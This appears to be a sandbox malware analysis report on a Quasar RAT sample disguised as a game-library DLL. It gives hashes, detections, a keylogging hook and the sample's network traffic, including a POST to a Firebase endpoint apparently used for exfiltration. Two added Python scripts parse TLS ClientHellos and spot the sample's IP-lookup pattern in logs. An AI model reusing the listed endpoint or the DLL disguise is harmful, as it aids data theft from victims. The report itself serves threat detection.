Windows Analysis Report
vstdlib_s64.dll.dll

Overview

General Information

  • Sample name: vstdlib_s64.dll.dll (renamed file extension from exe to dll)
  • Original sample name: vstdlib_s64.dll.exe
  • Analysis ID: 1473780
  • MD5: ac7da10e20d625cc463536172d0ac33e
  • SHA1: c4242194e3faa82506513e2572c160a30082bfb0
  • SHA256: 6799f1948048b91991392b421ccc6b30be415cda26deb71baeecb33b41b12959
  • Tags: BlotchyQuasar, exe, RAT

Detection

  • Quasar
  • Score: 80 (range 0 - 100)
  • Whitelisted: false
  • Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Quasar RAT
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6852 cmdline: loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2696 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 6992 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 796 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6200 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 5236 cmdline: rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7112 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7120 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2496 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 4136 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1052 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 1184 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7096 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7100 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8 MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6972 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 6252 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7152 cmdline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Note on reading the tree: loaddll64.exe is the sandbox's DLL loader harness, and the one-rundll32.exe-per-export fan-out (V_FixDoubleSlashes, V_strncpy, V_UTF8ToUTF16, ...) is the sandbox calling each exported entry point in turn so that all of them get executed. Those rundll32.exe processes are analysis instrumentation, not process creation by the sample; the network activity attributed to rundll32.exe below is the DLL's code running inside the host process the sandbox chose for it.
Threat name

  • Name: Quasar RAT, QuasarRAT
  • Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • Attribution: APT33, Dropping Elephant, Stone Panda, The Gorgon Group
  • Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

No configs have been found
Yara overview (all matches: rule JoeSecurity_Quasar, description "Yara detected Quasar RAT", author Joe Security)

Initial sample:
  • vstdlib_s64.dll.dll

Dumped memory (5 of 36 matches shown):
  • 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp
  • 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp
  • 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp

Unpacked PEs (5 of 29 matches shown):
  • 13.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 16.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 18.2.rundll32.exe.1fbe5a90000.0.unpack
  • 6.2.rundll32.exe.1c4bec00000.0.unpack
  • 7.2.rundll32.exe.2755e650000.0.unpack
                        No Sigma rule has matched
Snort IDS alerts

  • 07/15/24-21:07:19.513418  SID 2814031  TCP, source port 49738 -> destination port 80  Classtype: A Network Trojan was detected
  • 07/15/24-21:07:19.945864  SID 2814030  TCP, source port 49739 -> destination port 80  Classtype: A Network Trojan was detected


                        AV Detection

Source: vstdlib_s64.dll.dll; ReversingLabs: Detection: 26%
Source: Yara match; file source: vstdlib_s64.dll.dll, type: SAMPLE
Source: Yara match; file sources of type UNPACKEDPE:
  • 13.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 16.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 18.2.rundll32.exe.1fbe5a90000.0.unpack
  • 6.2.rundll32.exe.1c4bec00000.0.unpack
  • 7.2.rundll32.exe.2755e650000.0.unpack
  • 12.2.rundll32.exe.2caf50d0000.0.unpack
  • 12.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 5.2.rundll32.exe.24c76550000.0.unpack
  • 5.2.rundll32.exe.7ffdfb180000.1.unpack
  • 14.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 10.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 15.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 4.2.rundll32.exe.7ffdfb180000.1.unpack
  • 17.2.rundll32.exe.19d796c0000.0.unpack
  • 13.2.rundll32.exe.1e0a1960000.0.unpack
  • 4.2.rundll32.exe.2596ef30000.0.unpack
  • 11.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 11.2.rundll32.exe.1d54ab70000.0.unpack
  • 14.2.rundll32.exe.23d3f970000.0.unpack
  • 8.2.rundll32.exe.1dd420a0000.0.unpack
  • 7.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 8.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 9.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 15.2.rundll32.exe.2d2ec850000.0.unpack
  • 9.2.rundll32.exe.13f23770000.0.unpack
  • 3.2.rundll32.exe.7ffdfb180000.1.unpack
  • 6.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 19.2.rundll32.exe.24f7dfe0000.0.unpack
  • 16.2.rundll32.exe.20471360000.0.unpack
  • 10.2.rundll32.exe.1edf6db0000.0.unpack
  • 19.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 18.2.rundll32.exe.7ffdfb3a0000.1.unpack
  • 3.2.rundll32.exe.2a89aaa0000.0.unpack
  • 17.2.rundll32.exe.7ffdfb3a0000.1.unpack
Source: Yara match; file sources of type MEMORY:
  • 00000005.00000002.1711858916.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp
  • 0000000B.00000002.1803940812.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000003.00000002.1682910878.000002A89AAA2000.00000020.00000001.01000000.00000003.sdmp
  • 00000011.00000002.1803619460.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000003.00000002.1684076753.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp
  • 0000000B.00000002.1796633648.000001D54AB72000.00000020.00000001.01000000.00000003.sdmp
  • 0000000D.00000002.1801854722.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000004.00000002.1684166716.00007FFDFB182000.00000020.00000001.01000000.00000003.sdmp
  • 00000011.00000002.1795873767.0000019D796C2000.00000020.00000001.01000000.00000003.sdmp
  • 0000000C.00000002.1803576304.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 0000000A.00000002.1806601416.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 0000000E.00000002.1805439876.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000004.00000002.1683326542.000002596EF32000.00000020.00000001.01000000.00000003.sdmp
  • 00000010.00000002.2929241294.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp
  • 0000000E.00000002.1798302966.0000023D3F972000.00000020.00000001.01000000.00000003.sdmp
  • 0000000F.00000002.1805465891.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000012.00000002.1800394851.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 00000013.00000002.1802596768.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp
  • 0000000C.00000002.1795862473.000002CAF50D2000.00000020.00000001.01000000.00000003.sdmp
  • 00000009.00000002.1795742842.0000013F23772000.00000020.00000001.01000000.00000003.sdmp
  • 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp
  • 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp
  • 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp
  • 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp
  • 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp
  • 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp
  • 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp
  • 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp
Source: Yara match; file sources of type MEMORYSTR (process memory space):
  • rundll32.exe PID: 796
  • rundll32.exe PID: 6992
  • rundll32.exe PID: 6200
  • rundll32.exe PID: 5236
  • rundll32.exe PID: 7112
  • rundll32.exe PID: 7120
  • rundll32.exe PID: 2496
Source: vstdlib_s64.dll.dll; Joe Sandbox ML: detected
Source: unknown; HTTPS traffic detected: 35.201.97.85:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: vstdlib_s64.dll.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
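The "version: TLS 1.0" recorded for the HTTPS connection above is read from the ClientHello the client sent. The Python script below is an added example, not part of the Joe Sandbox report and not code from the sample: it builds constructed ClientHello records (the bytes are not captured traffic; the host name is taken from the Firebase URL the report lists) and parses them to show where that version comes from. For TLS 1.0 and 1.1 clients it is the legacy version field; TLS 1.2 and 1.3 clients keep that field at 0x0303 and announce what they really support in the supported_versions extension, so a parser that only reads the legacy field under-reports them. An older .NET Framework client that never sets ServicePointManager.SecurityProtocol offers only SSL 3.0/TLS 1.0 by default, which is a plausible reason for what the sandbox saw, although the report itself does not say why.

```python
"""Parse a TLS ClientHello and flag legacy protocol versions.

Added example, not taken from the Joe Sandbox report or from the sample.
All byte strings are constructed here via build_client_hello().
"""
import struct

TLS_VERSIONS = {
    0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1",
    0x0303: "TLS 1.2", 0x0304: "TLS 1.3",
}
MIN_ACCEPTABLE = 0x0303  # anything below TLS 1.2 is flagged


def build_client_hello(legacy_version, sni=None, supported_versions=None):
    """Construct a minimal ClientHello record (test input, not captured traffic)."""
    extensions = b""
    if sni is not None:
        name = sni.encode("ascii")
        entry = b"\x00" + struct.pack("!H", len(name)) + name      # name_type host_name
        name_list = struct.pack("!H", len(entry)) + entry
        extensions += struct.pack("!HH", 0x0000, len(name_list)) + name_list
    if supported_versions:
        vers = b"".join(struct.pack("!H", v) for v in supported_versions)
        body = bytes([len(vers)]) + vers
        extensions += struct.pack("!HH", 0x002B, len(body)) + body
    hello = (struct.pack("!H", legacy_version)
             + bytes(32)                              # client random (zeroed for the example)
             + b"\x00"                                # empty session id
             + struct.pack("!H", 2) + b"\x00\x2f"     # one suite: TLS_RSA_WITH_AES_128_CBC_SHA
             + b"\x01\x00")                           # compression methods: null only
    if extensions:
        hello += struct.pack("!H", len(extensions)) + extensions
    handshake = b"\x01" + len(hello).to_bytes(3, "big") + hello    # HandshakeType client_hello
    return b"\x16" + struct.pack("!HH", 0x0301, len(handshake)) + handshake


def parse_client_hello(record):
    """Return legacy_version, supported_versions list and SNI from a ClientHello record."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    info = {"legacy_version": struct.unpack("!H", body[0:2])[0],
            "supported_versions": [], "sni": None}
    pos = 2 + 32                                            # skip client random
    pos += 1 + body[pos]                                    # session id
    pos += 2 + struct.unpack("!H", body[pos:pos + 2])[0]    # cipher suites
    pos += 1 + body[pos]                                    # compression methods
    if pos < len(body):                                     # extensions are optional
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            data = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype == 0x0000:                             # server_name
                name_len = struct.unpack("!H", data[3:5])[0]
                info["sni"] = data[5:5 + name_len].decode("ascii")
            elif etype == 0x002B:                           # supported_versions
                count = data[0] // 2
                info["supported_versions"] = [
                    struct.unpack("!H", data[1 + 2 * i:3 + 2 * i])[0] for i in range(count)]
    return info


def max_offered_version(info):
    """Highest real version offered; GREASE values (not in TLS_VERSIONS) are ignored."""
    known = [v for v in info["supported_versions"] if v in TLS_VERSIONS]
    return max(known) if known else info["legacy_version"]


def assess(record):
    info = parse_client_hello(record)
    top = max_offered_version(info)
    return {"sni": info["sni"], "max_version": TLS_VERSIONS.get(top, hex(top)),
            "insecure": top < MIN_ACCEPTABLE}


if __name__ == "__main__":
    legacy = build_client_hello(0x0301, sni="argentina-e4162-default-rtdb.firebaseio.com")
    modern = build_client_hello(0x0303, sni="example.invalid", supported_versions=[0x0A0A, 0x0304, 0x0303])
    print(assess(legacy))   # offers at most TLS 1.0 -> insecure
    print(assess(modern))   # TLS 1.3 via supported_versions -> acceptable
```

The version a sandbox prints is the best the client offered, not what was negotiated; the ServerHello settles that. A TLS 1.0-only offer is also a fingerprint in its own right: the JA3 hash listed under Networking is computed over the ClientHello version, cipher suites and extensions, which is why the report can tie it to other malware using the same HTTP stack.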

                        Networking

Source: Traffic; Snort IDS: 2814031 ETPRO TROJAN W32/Quasar RAT Connectivity Check 192.168.2.4:49738 -> 88.198.193.213:80
Source: Traffic; Snort IDS: 2814030 ETPRO TROJAN W32/Quasar RAT Connectivity Check 2 192.168.2.4:49739 -> 3.33.130.190:80
Source: C:\Windows\System32\rundll32.exe; Network Connect: 88.198.193.213 80
Source: C:\Windows\System32\rundll32.exe; Network Connect: 35.201.97.85 443
Source: C:\Windows\System32\rundll32.exe; Network Connect: 104.26.13.205 80
Source: C:\Windows\System32\rundll32.exe; Network Connect: 3.33.130.190 80
Source: global traffic; HTTP traffic detected:
    POST /user.json HTTP/1.1
    Content-Type: application/json; charset=utf-8
    Host: argentina-e4162-default-rtdb.firebaseio.com
    Content-Length: 76
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 88.198.193.213
Source: Joe Sandbox View; IP Address: 104.26.13.205
Source: Joe Sandbox View; IP Address: 3.33.130.190
Source: Joe Sandbox View; ASN Name: HETZNER-ASDE
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; DNS query: name: freegeoip.net
Source: unknown; DNS query: name: api.ipify.org (queried twice)
Source: global traffic; HTTP traffic detected:
    GET /geoip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
    Host: telize.com
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET /xml/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
    Host: freegeoip.net
    Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown; HTTPS traffic detected: 35.201.97.85:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: global traffic; DNS traffic detected: DNS query: argentina-e4162-default-rtdb.firebaseio.com
Source: global traffic; DNS traffic detected: DNS query: telize.com
Source: global traffic; DNS traffic detected: DNS query: freegeoip.net
Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
Source: rundll32.exe memory dumps 00000006.00000002.1742655748.000001C4BEC02000.00000020.00000001.01000000.00000003.sdmp, 00000006.00000002.1743520661.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, 00000007.00000002.1800566707.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, 00000008.00000002.1798585277.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, 00000008.00000002.1782774058.000001DD420A2000.00000020.00000001.01000000.00000003.sdmp, 00000009.00000002.1803017561.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp; strings found in binary or memory:
  • http://api.ipify.org/
  • http://freegeoip.net/xml/
  • http://telize.com/geoip
  • https://argentina-e4162-default-rtdb.firebaseio.com/user.json
Source: unknown; Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49735
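The three GETs above (telize.com, freegeoip.net and api.ipify.org, all carrying a Firefox 36 User-Agent) are the requests the ETPRO "Quasar RAT Connectivity Check" alerts fire on, and the POST to firebaseio.com is the one behind the "HTTP GET or POST without a user agent" signature: it has no User-Agent header at all, and its Expect: 100-continue header is what .NET's HttpWebRequest adds to POST requests by default. The Python script below is an added example, not drawn from the report or from the Quasar project, that applies the same reasoning to constructed HTTP proxy log lines mirroring the requests the sandbox recorded. It tags public-IP lookup hosts, a missing or stale User-Agent and a burst of several lookups from one client, and raises a combined finding only when they coincide. The log layout, the lookup hosts beyond the three on this page, and the burst thresholds are assumptions.

```python
"""Flag the Quasar-style IP-check / connectivity-check pattern in HTTP logs.

Added example; not part of the Joe Sandbox report and not Quasar project code.
Assumed log layout per line: timestamp client method host path user-agent
(a lone "-" in the last field means the request carried no User-Agent header).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Public-IP / geolocation echo services. The first three are the hosts seen in
# the report; the remaining entries are assumed additions of the same kind.
IP_CHECK_HOSTS = {
    "telize.com", "freegeoip.net", "api.ipify.org",
    "ip-api.com", "ipinfo.io", "icanhazip.com", "checkip.dyndns.org",
}
# The User-Agent the sandbox recorded advertises Firefox 36, a 2015 release.
STALE_UA_MARKERS = ("Firefox/36.0",)
BURST_WINDOW = timedelta(seconds=10)   # assumed threshold
BURST_MIN = 2                          # assumed threshold

# Constructed sample log: the first four lines mirror the report's traffic,
# the last one is an unrelated client running a current browser.
SAMPLE_LOG = """\
2024-07-15T21:07:18Z 192.168.2.4 GET telize.com /geoip Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
2024-07-15T21:07:19Z 192.168.2.4 GET freegeoip.net /xml/ Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
2024-07-15T21:07:19Z 192.168.2.4 GET api.ipify.org / Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
2024-07-15T21:07:21Z 192.168.2.4 POST argentina-e4162-default-rtdb.firebaseio.com /user.json -
2024-07-15T21:09:02Z 192.168.2.7 GET www.example.com / Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
"""


def parse_log(text):
    """Split each log line into a dict; the User-Agent may itself contain spaces."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, ua = line.split(maxsplit=5)
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "client": client, "method": method.upper(), "host": host.lower(),
            "path": path, "ua": None if ua == "-" else ua,
        })
    return events


def tag_event(ev):
    """Per-request indicators; none of these is conclusive on its own."""
    tags = set()
    if ev["host"] in IP_CHECK_HOSTS:
        tags.add("ip_check")
    if ev["ua"] is None:
        tags.add("no_user_agent")
    elif any(marker in ev["ua"] for marker in STALE_UA_MARKERS):
        tags.add("stale_user_agent")
    return tags


def analyse(events):
    """Return {client: set_of_tags} for clients that have at least one indicator."""
    per_client = defaultdict(set)
    ip_check_times = defaultdict(list)
    for ev in events:
        tags = tag_event(ev)
        per_client[ev["client"]] |= tags
        if "ip_check" in tags:
            ip_check_times[ev["client"]].append(ev["ts"])
    # A burst: BURST_MIN lookups of IP-echo services inside BURST_WINDOW.
    for client, times in ip_check_times.items():
        times.sort()
        for i in range(len(times) - BURST_MIN + 1):
            if times[i + BURST_MIN - 1] - times[i] <= BURST_WINDOW:
                per_client[client].add("ip_check_burst")
                break
    # Combined finding: the burst plus a non-browser-looking User-Agent profile.
    for tags in per_client.values():
        if "ip_check_burst" in tags and tags & {"no_user_agent", "stale_user_agent"}:
            tags.add("quasar_like_connectivity_check")
    return {client: tags for client, tags in per_client.items() if tags}


if __name__ == "__main__":
    for client, tags in analyse(parse_log(SAMPLE_LOG)).items():
        print(client, sorted(tags))
```

Any single request to these services is common in legitimate software (updaters, VPN clients, dynamic-DNS agents), so the combination is the signal, not one line. Matching the literal Firefox/36.0 string is brittle, since a rebuilt sample can change it; the burst-plus-missing-User-Agent logic survives that, and the Firebase POST without a User-Agent is the more durable of the two indicators.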

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: vstdlib_s64.dll.dll, oqBXyy.cs; .Net Code: Instal_Key_Capt
Source: vstdlib_s64.dll.dll, pblsOey.cs; .Net Code: hook

                        E-Banking Fraud

Source: Yara match; the same JoeSecurity_Quasar matches listed under AV Detection (the sample file, the 34 unpacked PE regions of type UNPACKEDPE and the rundll32.exe memory dumps of type MEMORY) are attributed to this category as well.
                        Source: Yara matchFile source: 0000000A.00000002.1799338023.000001EDF6DB2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000002.1794900321.0000024F7DFE2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.1798309140.000002D2EC852000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.2926634464.0000020471362000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1711125446.0000024C76552000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.1794101772.000001E0A1962000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000002.1787872788.000001FBE5A92000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789628850.000002755E652000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 796, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6992, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6200, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7112, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7120, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2496, type: MEMORYSTR
Source: C:\Windows\System32\rundll32.exe; File created: C:\Windows\system32\Data.log
Source: vstdlib_s64.dll.dll; Static PE information: invalid certificate
Source: vstdlib_s64.dll.dll, jnrUhiH.cs; Base64 encoded string: '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'
Source: classification engine; Classification label: mal80.troj.spyw.evad.winDLL@38/2@4/4
Source: C:\Windows\System32\rundll32.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rundll32.exe.log
Source: C:\Windows\System32\rundll32.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
Source: C:\Windows\System32\rundll32.exe; Mutant created: \Sessions\1\BaseNamedObjects\e4d6a6ec-320d-48ee-b6b2-fa24f03760d4
Source: vstdlib_s64.dll.dll; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vstdlib_s64.dll.dll; Static file information: TRID: Win64 Dynamic Link Library (generic) Net Framework (111504/3) 44.42%
Source: C:\Windows\System32\loaddll64.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
Source: vstdlib_s64.dll.dll; ReversingLabs: Detection: 26%
Source: unknown; Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
Source: C:\Windows\System32\loaddll64.exe; Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
